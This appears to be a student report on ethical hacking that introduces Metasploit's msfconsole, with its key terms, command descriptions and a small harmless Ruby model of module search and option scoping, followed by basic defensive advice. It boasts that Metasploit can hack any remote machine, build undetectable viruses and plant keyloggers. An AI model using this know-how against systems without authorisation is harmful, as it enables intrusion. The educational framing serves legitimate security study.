Exploit: to take advantage of a security flaw within a system, network, or application.
Payload: the code that the Metasploit framework makes the victim computer execute.
Module: a small piece of code that can be added to the Metasploit framework to execute an
attack.
Shellcode: a small piece of code used as a payload.
MSF console
MSF console is an all-in-one interface to most of the features in Metasploit.
MSF console can be used to launch attacks, create listeners, and much, much more.
Metasploit comes installed by default on BackTrack 5. To access MSF console, open your
console and type:
root@bt:~# cd /opt/framework3/msf3/
root@bt:/opt/framework3/msf3# msfconsole
After some time, msfconsole will boot.
Or you can directly use the “msfconsole” command to open Metasploit.
What can we do with Metasploit?
We can hack all platforms: Windows, Linux, Sun Solaris, AIX etc.
We can hack any remote machine using the available exploits for Adobe Acrobat 9.0.0.0,
8.1.1, Winamp, RealPlayer, Oracle, Mozilla, IE, Yahoo Messenger.
We can create undetectable viruses in exe, java, pdf, mp3 etc. formats.
We can sniff network traffic and sessions for email passwords, SSL protection and data
protection.
We can install a keylogger on a remote machine, record audio etc.
Msfconsole Commands:
1. show: Entering 'show' at the msfconsole prompt will display every module within
Metasploit. There are a number of 'show' commands you can use but the ones you will
use most frequently are 'show auxiliary', 'show exploits', 'show payloads' and 'show
encoders'.
show targets: shows the targets of a particular exploit.
show options: shows the various options of an exploit.
show exploits: lists all exploits.
show auxiliary: lists all auxiliary modules.
2. use: When you have decided on a particular module to make use of, issue the 'use'
command to select it. The 'use' command changes your context to a specific module,
exposing type-specific commands. Notice in the output below that any global
variables that were previously set are already configured.
3. set: The 'set' command allows you to configure Framework options and parameters for
the current module you are working with.
4. unset: The opposite of the 'set' command, of course, is 'unset'. 'unset' removes a
parameter previously configured with 'set'. You can remove all assigned
variables with 'unset all'.
5. back: Once you have finished working with a particular module, or if you inadvertently
select the wrong module, you can issue the 'back' command to move out of the
current context. This, however, is not required. Just as you can in commercial
routers, you can switch modules from within other modules. As a reminder, variables
will only carry over if they are set globally.
6. check: There aren't many exploits that support it, but there is also a 'check' option that will
check whether a target is vulnerable to a particular exploit instead of actually
exploiting it.
7. info: The 'info' command will provide detailed information about a particular module
including all options, targets, and other information. Be sure to always read the module
description prior to using it as some may have undesired effects.
The info command also provides the following information: the author and licensing
information, vulnerability references (i.e. CVE, BID, etc.) and any payload
restrictions the module may have.
8. search: The msfconsole includes an extensive regular-expression based search
functionality. If you have a general idea of what you are looking for you can search
for it via 'search'. In the output below, a search is being made for MS Bulletin MS09-011.
The search function will locate this string within the module names,
descriptions, references, etc.
9. sessions: The 'sessions' command allows you to list, interact with, and kill spawned
sessions. The sessions can be shells, Meterpreter sessions, VNC, etc.
sessions -l: to list any active sessions.
sessions -i: to interact with a given session, just use the '-i' switch followed by the
id number of the session.
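To make the behaviour of 'search', 'use', 'set', 'unset' and 'back' concrete, here is a small Ruby model of the msfconsole datastore semantics described above (an added example, not code from this report or from the Metasploit project). The module names, descriptions and references it indexes are constructed for illustration; 'setg' is the global form of 'set'.

```ruby
# Added example (not from the report or the Metasploit project): a tiny model of
# msfconsole's module search and of how options set per module differ from
# options set globally. Module names/references below are constructed.
class MiniConsole
  MODULES = {
    "exploit/example/smb_demo"   => { desc: "Constructed SMB demo module",
                                      refs: ["MSB-MS09-011", "CVE-0000-EXAMPLE"] },
    "auxiliary/scanner/tcp_demo" => { desc: "Constructed TCP port scanner", refs: [] },
  }.freeze

  attr_reader :current

  def initialize
    @globals = {}   # 'setg': carried into every module context
    @locals  = {}   # 'set': belongs to the currently selected module only
    @current = nil
  end

  # 'search <regex>': case-insensitive match on name, description or references
  def search(pattern)
    re = Regexp.new(pattern, Regexp::IGNORECASE)
    MODULES.select { |name, m| [name, m[:desc], *m[:refs]].any? { |f| re.match?(f) } }.keys
  end

  # 'use <module>': enter a module context; the old module's locals are dropped,
  # while globals are "already configured" in the new context
  def use(name)
    raise ArgumentError, "unknown module #{name}" unless MODULES.key?(name)
    @current = name
    @locals  = {}
    self
  end

  def set(key, value);  @locals[key.upcase]  = value; self; end
  def setg(key, value); @globals[key.upcase] = value; self; end

  # 'unset <key>' and 'unset all' remove module-level options only
  def unset(key)
    key.casecmp?("all") ? @locals.clear : @locals.delete(key.upcase)
    self
  end

  # 'back': leave the module context; only globally set variables survive
  def back; @current = nil; @locals = {}; self; end

  # what 'show options' would display: module values override globals of the same name
  def options; @globals.merge(@locals); end
end
```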
Conclusion
Ethical hacking is not a criminal activity and should not be considered as such. While it is true
that malicious hacking is a computer crime and criminal activity, ethical hacking is never a crime.
Ethical hacking is in line with industry regulation and organizational IT policies. Malicious hacking
should be prevented, while ethical hacking, which promotes research, innovation, and
technological breakthroughs, should be encouraged and allowed.
The main conclusion of this study of ethical hacking is to define which kinds of tools and
techniques hackers use to get into a personal computer system.
Its various Perspectives:
Student:
A student should understand that no software is made with zero vulnerabilities. So
while they are studying they should study the various possibilities and how to
prevent them, because they are the professionals of tomorrow.
Professionals:
Professionals should understand that business is directly related to security. So they
should make new software with as few vulnerabilities as possible; if they are not aware
of these then they won’t be cautious enough in security matters.
In the preceding sections we saw the methodology of hacking, why we should be aware
of hacking and its tools, and some tools which a hacker may use. Now we can see what
we can do against hacking, or to protect ourselves from hacking.
The first thing is that we should keep the software we use updated, from official and
reliable sources.
Educate employees and users against black-hat hacking.
Use every possible security measure.
Always make our passwords strong by making them longer and harder to crack.